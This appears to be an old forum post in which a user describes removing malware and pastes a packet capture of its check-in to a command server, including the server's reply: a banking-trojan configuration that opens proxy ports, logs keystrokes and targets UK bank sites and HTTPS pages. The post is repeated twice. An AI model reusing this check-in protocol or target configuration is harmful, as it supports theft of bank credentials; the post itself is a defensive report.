R
-rehn-
I have manually removed a malware from my system.
It was opening a lot of ports.
And every time it opend a new port
it was "calling home" to 83.149.82.168
I can provide a full Ethereal dump
and the 3 "bad" files I found
if anybody is interested.
I have sent an email the isp's abuse.
This is what Ethereal extracted:
POST /cgi-bin/ref.cgi?Sun%20Apr%2017%2016%3A58%3A13.593%202005 HTTP/1.0
Host: nugget-sales.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 108
Accept: */*
Accept-Language: en
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Connection: close
i=2246824488&v=2805&os=WinNT5.1-2600&s=&h=&d=0&b=0&u=210&k=37103&m=37103&panic=0&c=United
Kingdom&l=ENG&mo=0
HTTP/1.1 200 OK
Date: Mon, 18 Apr 2005 04:00:09 GMT
Server: Apache/2.0.40 (Red Hat Linux)
Content-Length: 671
Connection: close
Content-Type: text/html; charset=ISO-8859-1
http +www.microsoft.com +Ba "Mozilla/4.0 (compatible\; MSIE 6.0\;
Windows NT 5.1)"
rmold
socks 0.0.0.0:65535
httpp +0.0.0.0:65535
log +everything +Smz 1 9;setwnd 8 * * * +wclCME 60 1;timer
-qewrqrewq;timer +qewrqrewq -R+AIc 10000000 "setwnd 8 * * * -E"
setwnd 0 *halifax-online.co.uk* * * +urfKPMWS 4096 2 200000
setwnd 1 *.lloydsts
b.co.uk* * * +urfKPMWS 4096 2 200000
setwnd 2 *.nwolb.com* * * +urfKPMWS 4096 2 200000
setwnd 3 *.hsbc.co.uk* * * +urfKPMWS 4096 2 200000
setwnd 4 *.barclays.co.uk* * * +urfKPMWS 4096 2 200000
setwnd 17 https://* * * +urfKPBMW 4096 1000 2
setwnd 18 * https://* * +urfKPBMW 4096 1000 2
setwnd 19 * * * +urfKP*MW 4096 2
http #hosts +I 60000
It was opening a lot of ports.
And every time it opend a new port
it was "calling home" to 83.149.82.168
I can provide a full Ethereal dump
and the 3 "bad" files I found
if anybody is interested.
I have sent an email the isp's abuse.
This is what Ethereal extracted:
POST /cgi-bin/ref.cgi?Sun%20Apr%2017%2016%3A58%3A13.593%202005 HTTP/1.0
Host: nugget-sales.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 108
Accept: */*
Accept-Language: en
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Connection: close
i=2246824488&v=2805&os=WinNT5.1-2600&s=&h=&d=0&b=0&u=210&k=37103&m=37103&panic=0&c=United
Kingdom&l=ENG&mo=0
HTTP/1.1 200 OK
Date: Mon, 18 Apr 2005 04:00:09 GMT
Server: Apache/2.0.40 (Red Hat Linux)
Content-Length: 671
Connection: close
Content-Type: text/html; charset=ISO-8859-1
http +www.microsoft.com +Ba "Mozilla/4.0 (compatible\; MSIE 6.0\;
Windows NT 5.1)"
rmold
socks 0.0.0.0:65535
httpp +0.0.0.0:65535
log +everything +Smz 1 9;setwnd 8 * * * +wclCME 60 1;timer
-qewrqrewq;timer +qewrqrewq -R+AIc 10000000 "setwnd 8 * * * -E"
setwnd 0 *halifax-online.co.uk* * * +urfKPMWS 4096 2 200000
setwnd 1 *.lloydsts
b.co.uk* * * +urfKPMWS 4096 2 200000
setwnd 2 *.nwolb.com* * * +urfKPMWS 4096 2 200000
setwnd 3 *.hsbc.co.uk* * * +urfKPMWS 4096 2 200000
setwnd 4 *.barclays.co.uk* * * +urfKPMWS 4096 2 200000
setwnd 17 https://* * * +urfKPBMW 4096 1000 2
setwnd 18 * https://* * +urfKPBMW 4096 1000 2
setwnd 19 * * * +urfKP*MW 4096 2
http #hosts +I 60000